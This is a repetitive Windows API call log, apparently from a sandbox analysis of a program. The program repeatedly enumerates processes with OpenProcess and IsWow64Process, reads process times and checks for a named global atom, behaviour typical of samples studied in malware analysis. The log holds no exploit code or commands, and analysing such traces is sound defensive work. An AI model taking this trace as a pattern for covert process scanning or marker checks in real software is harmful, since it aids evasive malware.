	[0140.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.637] CloseHandle (hObject=0x2dc) returned 1
	[0140.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0140.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.637] CloseHandle (hObject=0x2dc) returned 1
	[0140.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0140.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.637] CloseHandle (hObject=0x2dc) returned 1
	[0140.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0140.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.637] CloseHandle (hObject=0x2dc) returned 1
	[0140.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0140.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.638] CloseHandle (hObject=0x2dc) returned 1
	[0140.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0140.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.638] CloseHandle (hObject=0x2dc) returned 1
	[0140.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0140.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.638] CloseHandle (hObject=0x2dc) returned 1
	[0140.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0140.639] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.639] CloseHandle (hObject=0x2dc) returned 1
	[0140.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.639] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.639] CloseHandle (hObject=0x2dc) returned 1
	[0140.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.639] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.640] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.640] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.640] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.641] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.641] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.641] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.641] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.641] CloseHandle (hObject=0x2dc) returned 1
	[0140.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0140.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.642] CloseHandle (hObject=0x2dc) returned 1
	[0140.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0140.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.642] CloseHandle (hObject=0x2dc) returned 1
	[0140.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0140.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.643] CloseHandle (hObject=0x2dc) returned 1
	[0140.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0140.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.643] CloseHandle (hObject=0x2dc) returned 1
	[0140.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0140.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.643] CloseHandle (hObject=0x2dc) returned 1
	[0140.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0140.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0140.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0140.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0140.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0140.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0140.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0140.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0140.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0140.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0140.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0140.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0140.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0140.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0140.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0140.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0140.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0140.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0140.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.680] CloseHandle (hObject=0x2dc) returned 1
	[0140.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0140.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0140.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0140.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.681] CloseHandle (hObject=0x2dc) returned 1
	[0140.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0140.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0140.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.681] CloseHandle (hObject=0x2dc) returned 1
	[0140.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0140.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.681] CloseHandle (hObject=0x2dc) returned 1
	[0140.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0140.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.682] CloseHandle (hObject=0x2dc) returned 1
	[0140.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0140.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.682] CloseHandle (hObject=0x2dc) returned 1
	[0140.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0140.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.682] CloseHandle (hObject=0x2dc) returned 1
	[0140.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0140.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.683] CloseHandle (hObject=0x2dc) returned 1
	[0140.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0140.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0140.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.683] CloseHandle (hObject=0x2dc) returned 1
	[0140.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0140.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.683] CloseHandle (hObject=0x2dc) returned 1
	[0140.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0140.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.684] CloseHandle (hObject=0x2dc) returned 1
	[0140.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0140.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.684] CloseHandle (hObject=0x2dc) returned 1
	[0140.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0140.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.684] CloseHandle (hObject=0x2dc) returned 1
	[0140.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0140.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.684] CloseHandle (hObject=0x2dc) returned 1
	[0140.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0140.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.685] CloseHandle (hObject=0x2dc) returned 1
	[0140.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0140.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.685] CloseHandle (hObject=0x2dc) returned 1
	[0140.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0140.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.685] CloseHandle (hObject=0x2dc) returned 1
	[0140.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0140.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.686] CloseHandle (hObject=0x2dc) returned 1
	[0140.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0140.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.686] CloseHandle (hObject=0x2dc) returned 1
	[0140.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0140.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.686] CloseHandle (hObject=0x2dc) returned 1
	[0140.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0140.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.686] CloseHandle (hObject=0x2dc) returned 1
	[0140.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0140.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.687] CloseHandle (hObject=0x2dc) returned 1
	[0140.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0140.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.687] CloseHandle (hObject=0x2dc) returned 1
	[0140.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0140.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.687] CloseHandle (hObject=0x2dc) returned 1
	[0140.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0140.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.687] CloseHandle (hObject=0x2dc) returned 1
	[0140.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0140.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.688] CloseHandle (hObject=0x2dc) returned 1
	[0140.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0140.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.688] CloseHandle (hObject=0x2dc) returned 1
	[0140.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0140.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.688] CloseHandle (hObject=0x2dc) returned 1
	[0140.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0140.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.689] CloseHandle (hObject=0x2dc) returned 1
	[0140.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.689] CloseHandle (hObject=0x2dc) returned 1
	[0140.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.690] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.690] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.690] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.691] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.691] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.691] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.691] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.691] CloseHandle (hObject=0x2dc) returned 1
	[0140.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0140.691] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.691] CloseHandle (hObject=0x2dc) returned 1
	[0140.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0140.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.692] CloseHandle (hObject=0x2dc) returned 1
	[0140.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0140.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.692] CloseHandle (hObject=0x2dc) returned 1
	[0140.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0140.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.692] CloseHandle (hObject=0x2dc) returned 1
	[0140.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0140.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.692] CloseHandle (hObject=0x2dc) returned 1
	[0140.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0140.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0140.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0140.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0140.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0140.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0140.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0140.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0140.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0140.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0140.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0140.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0140.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0140.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0140.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0140.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0140.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0140.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0140.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.730] CloseHandle (hObject=0x2dc) returned 1
	[0140.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0140.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0140.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0140.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.730] CloseHandle (hObject=0x2dc) returned 1
	[0140.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0140.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0140.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.731] CloseHandle (hObject=0x2dc) returned 1
	[0140.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0140.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.731] CloseHandle (hObject=0x2dc) returned 1
	[0140.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0140.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.731] CloseHandle (hObject=0x2dc) returned 1
	[0140.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0140.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.732] CloseHandle (hObject=0x2dc) returned 1
	[0140.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0140.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.732] CloseHandle (hObject=0x2dc) returned 1
	[0140.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0140.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.732] CloseHandle (hObject=0x2dc) returned 1
	[0140.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0140.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0140.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.733] CloseHandle (hObject=0x2dc) returned 1
	[0140.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0140.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.733] CloseHandle (hObject=0x2dc) returned 1
	[0140.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0140.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.733] CloseHandle (hObject=0x2dc) returned 1
	[0140.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0140.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.734] CloseHandle (hObject=0x2dc) returned 1
	[0140.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0140.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.734] CloseHandle (hObject=0x2dc) returned 1
	[0140.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0140.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.734] CloseHandle (hObject=0x2dc) returned 1
	[0140.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0140.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.734] CloseHandle (hObject=0x2dc) returned 1
	[0140.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0140.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.735] CloseHandle (hObject=0x2dc) returned 1
	[0140.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0140.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.735] CloseHandle (hObject=0x2dc) returned 1
	[0140.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0140.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.735] CloseHandle (hObject=0x2dc) returned 1
	[0140.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0140.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.735] CloseHandle (hObject=0x2dc) returned 1
	[0140.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0140.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.736] CloseHandle (hObject=0x2dc) returned 1
	[0140.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0140.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.736] CloseHandle (hObject=0x2dc) returned 1
	[0140.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0140.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.736] CloseHandle (hObject=0x2dc) returned 1
	[0140.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0140.737] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.737] CloseHandle (hObject=0x2dc) returned 1
	[0140.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0140.737] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.737] CloseHandle (hObject=0x2dc) returned 1
	[0140.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
